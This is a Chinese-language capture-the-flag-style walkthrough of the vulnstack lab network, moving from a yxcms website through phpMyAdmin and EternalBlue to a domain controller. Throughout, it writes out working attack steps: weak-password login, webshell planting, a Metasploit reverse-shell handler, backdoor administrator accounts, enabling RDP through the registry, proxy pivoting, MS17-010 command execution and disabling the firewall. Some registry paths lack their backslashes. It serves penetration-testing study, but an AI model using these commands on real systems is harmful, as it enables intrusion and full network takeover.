靶场下载地址漏洞详情http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
攻击机:kali:172.26.16.122
255.255.254.0
win7双网卡 外网连接kali:172.26.16.123
255.255.254.0
内网网卡:192.168.52.143
Win2003:内网ip 192.168.52.141
255.255.255.0
Win2008:内网IP 192.168.52.138
255.255.255.0
配置好环境
第一步 使kali机扫描内网IP
然后得知 win7IP是172.26.16.123
然后nmap -Pn -sT 172.26.16.123
得知打开了80端口 然后使用浏览器访问 172.26.16.123
然后发现mysql数据库 于是弱密码root root发现连接成功 判断有phpmyadmin
判断有phpmyadmin 于是使用刚才的用户密码登录
于是发现 newyxcms
百度一下yxcms的后台登陆页面,顺便百度下、一下关于yxcms的漏洞
然后访问http://172.26.16.123/yxcms
然后发现提示 给了访问地址与密码 于是访问进行访问登录
于是发现前台模板文件
进入在文件里写一句话木马 echo "cmd"是方便在页面发现马子文件路径
发现修改的文件了 然后进行复制连接 使用蚁剑进行连接webshell
连接成功了
然后使用kali机生成一个msf文件使用蚁剑进行上传
然后运行木马
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 172.26.16.122
Set LPORT 7744
下一步有返回后就开始提权
然后再这里通过蚁剑添加一个win7用户
并加到管理员组
然后 netstat -an查看开发端口
然后发现没有打开3389 下面使用蚁剑打开3389
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal""Server /v fDenyTSConnections /t REG_DWORD /d 00000000/f
然后netstat -an
打开之后使用kali远程登录
然后在win7里面ipconfig 发现内网IP 192.168.52.143
添加路由,挂socks4a代理
然后设置通往192.168.52.0/24的路由
这样,我们就可以通过msf 进入.52网段
设置代理
search socks
use auxiliary/server/socks_proxy
set srvhost 172.26.16.122 本机的代理地址
set version 4a
run
修改proxychains配置文件
然后开始进攻192.168.52.141 域用户
然后使用代理扫描192.168.52.141
得知开启了445端口
下面目标 渗透win2003(远程登录)
由nmap看到开放445端口
尝试永恒之蓝攻击win2003
use exploit/windows/smb/ms17_010_psexec //windows 2003 的攻击模块
然后设置 rhosts
然后进入
use auxiliary/admin/smb/ms17_010_command
use auxiliary/admin/smb/ms17_010_command
show options
set rhosts 192.168.52.141
set command net user xiao lbb1111.. /add #添加用户
run #成功执行
set command net localgroup administrators xiao /add #管理员权限
run #成功执行
set command 'REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' //开启3389端口
run #成功执行
然后代理nmap扫描看看3389端口开了吗
这里已经打开了 然后使用代理远程进行连接
这里刚才创建的xiao用户不是域用户 只是一个普通的管理员用户 所以不能以域用户登录
然后拿下第二台
然后开始渗透地三台机子
通过代理 nmap -Pn -sT 192.168.52.0/24
得知第三台域控 IP 192.168.52.138
然后代理扫描发现没有开启 3389 但是开启了135 与445
然后进入use auxiliary/admin/smb/ms17_010_command 里添加用户 并添加到管理员组
use auxiliary/admin/smb/ms17_010_command
show options
set rhosts 192.168.52.138
set command net user xiao lbb1111.. /add #添加用户
run #成功执行
set command net localgroup administrators xiao /add #管理员权限
run #成功执行
set command 'REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' #开启3389端口
run #成功执行
netsh advfirewall set allprofiles state off #关闭防火墙
run#成功执行
然后 set command netstat -an 查看3389 端口打开吗
打开了就可以通过代理远程登录了
然后使用代理登录192.168.52.138



